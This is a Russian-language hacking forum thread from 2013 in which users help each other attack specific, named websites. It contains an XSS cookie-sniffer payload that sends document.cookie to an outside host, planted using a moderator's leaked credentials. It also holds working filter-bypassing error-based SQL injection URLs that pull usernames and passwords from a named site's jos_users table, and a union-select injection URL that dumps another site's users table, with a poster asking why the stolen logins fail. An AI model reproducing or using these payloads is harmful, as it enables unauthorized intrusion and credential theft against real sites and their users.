11.05.2013, 14:39
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457
Репутация:
-10
|
|
Решил впервые заняться xss,попался форум vbulletin, на котором есть логин и пароль модератора,зашёл в modcp добавил обьявление в заголовке и в описании ">alert('XSS') всё выполняеться успешно пробую подставить снифер
img = new Image();
img.src = "http://lada-priora.ru/forum/images/deluxe/s.gif?"+document.cookie;
Но на снифер приходит только это QUERY: r4870=1; bblastvisit=1368254092; bblastactivity=0 , ip и agent
Подскажите что не правильно делаю?
|
|
|
11.05.2013, 18:13
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Sat-hacker
Решил впервые заняться xss,попался форум vbulletin,
...
Подскажите что не правильно делаю?
На vB при некоторых настройках куки привязаны к ip и разумеется всегда httpOnly.
Если удалось получить XSS, нужно её сразу использовать для совершения необходимых действий или найти возможность получения куков другим способом, записать юзер-агент и заходить под IP из той-же подсети.
Вы определитесь, что вам собственно нужно сделать и для чего.
|
|
|
|
11.05.2013, 18:48
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457
Репутация:
-10
|
|
XAMEHA проверял на виртуалке,ip одинаковый,использовал сразу.Хз мож снифер другой попробовать?
|
|
|
|
11.05.2013, 19:51
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466
Репутация:
3
|
|
Вопрос по XSS
Имеется site1.com.
Так же есть XSS вида alert() (т.е нет фильтрации символов) на site2.com
site1.com грузит через iframe site2.com.
Можно ли получить куки пользователя сайта site1.com используя XSS site2.com ??
Спасибо
|
|
|
|
12.05.2013, 04:21
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от WendM
Вопрос по XSS
Имеется
site1.com
.
Так же есть XSS вида
alert()
(т.е нет фильтрации символов)
на
site2.com
site1.com
грузит через iframe
site2.com
.
Можно ли получить куки пользователя сайта
site1.com
используя XSS
site2.com
??
Спасибо
нет нельзя. политика безопасности современных браузеров жестока)
А у меня такой вопрос... как происходит восстановление пароля на drupal 6? Если послать запрос на ретрив - пишется куда-нибудь токен?
На сайте рега модерируемая, не глянуть, а двиг скачать пока не позволяет инет лагающий
подскажите?
|
|
|
|
12.05.2013, 04:44
|
|
Познающий
Регистрация: 03.03.2013
Сообщений: 46
Провел на форуме:
11733
Репутация:
0
|
|
Можно ли как-нибудь обойти подстановку дефисов в '
[/CODE]
В итоге в конце страницы появляется
Код, соотв., не выполняется. Это возможно обойти?
Ну и ещё один вопрос - можно ли как-то выяснить оригинальный путь сохранения изображений? Заливаешь, к примеру, abc.php.jpg, а отображается какой-нибудь 1651656541854541.jpg |
|
|
|
12.05.2013, 21:14
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
Провел на форуме:
46989
Репутация:
20
|
|
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.
|
|
|
|
13.05.2013, 15:52
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Vip77
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.
В первую очередь, обратил бы ты внимание на то, что фильтрация SLECT & UNION - это вторичное. А первичное - это то, что фильтруется также кавычка, собвственно деформирующая запрос. И пока ты не найдешь способ обойти сей момент, можешь не волноваться по поводу фильтрации всего остального.
|
|
|
|
13.05.2013, 18:31
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от Vip77
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.
немного ошибся, фильтруется +
Сообщение от None
http://vkontakte.dj/index.php?option=com_fireboard&Go=1'or(seLEct*from (seLEct(name_const(veRsion(),1)),name_const(veRsio n(),1))a)and(1)='1
В общем сам добил
username
Сообщение от None
http://vkontakte.dj/index.php?option=com_fireboard&Go=1'/**/or/**/(seLEct/**/count(*)from(seLEct/**/1/**/uNIon/**/seLEct/**/2/**/uNIon/**/seLEct/**/3)x/**/group/**/by/**/concat(mid((seLEct/**/username/**/from/**/jos_users/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
password
Сообщение от None
http://vkontakte.dj/index.php?option=com_fireboard&Go=1'/**/or/**/(seLEct/**/count(*)from(seLEct/**/1/**/uNIon/**/seLEct/**/2/**/uNIon/**/seLEct/**/3)x/**/group/**/by/**/concat(mid((seLEct/**/password/**/from/**/jos_users/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Пробелы убрать не забудь
|
|
|
|
13.05.2013, 22:16
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Сообщение от sabe
http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.skintologyny.com/admin/login.php
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23
[/COLOR][COLOR="#0000BB"]почему не могу войти[/COLOR][COLOR="#007700"]?[/COLOR][/COLOR]
Сообщение от foma2120
Там много страниц авторизации
http://www.skintologyny.com/blog/wp-login.php
http://www.skintologyny.com/admin/login.php/admin/verifylogin.php
это ведь не от блога пароли указал а от users... а wp_users я не нашел такую таблицу в куррент дб, может кто угадает базу где блог..
а вторая ссылка что ты скинул это верифай логин походу одно и то же что вход в админку почему не пускает оч интересно проблема не решена
помогите узнать ответ) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
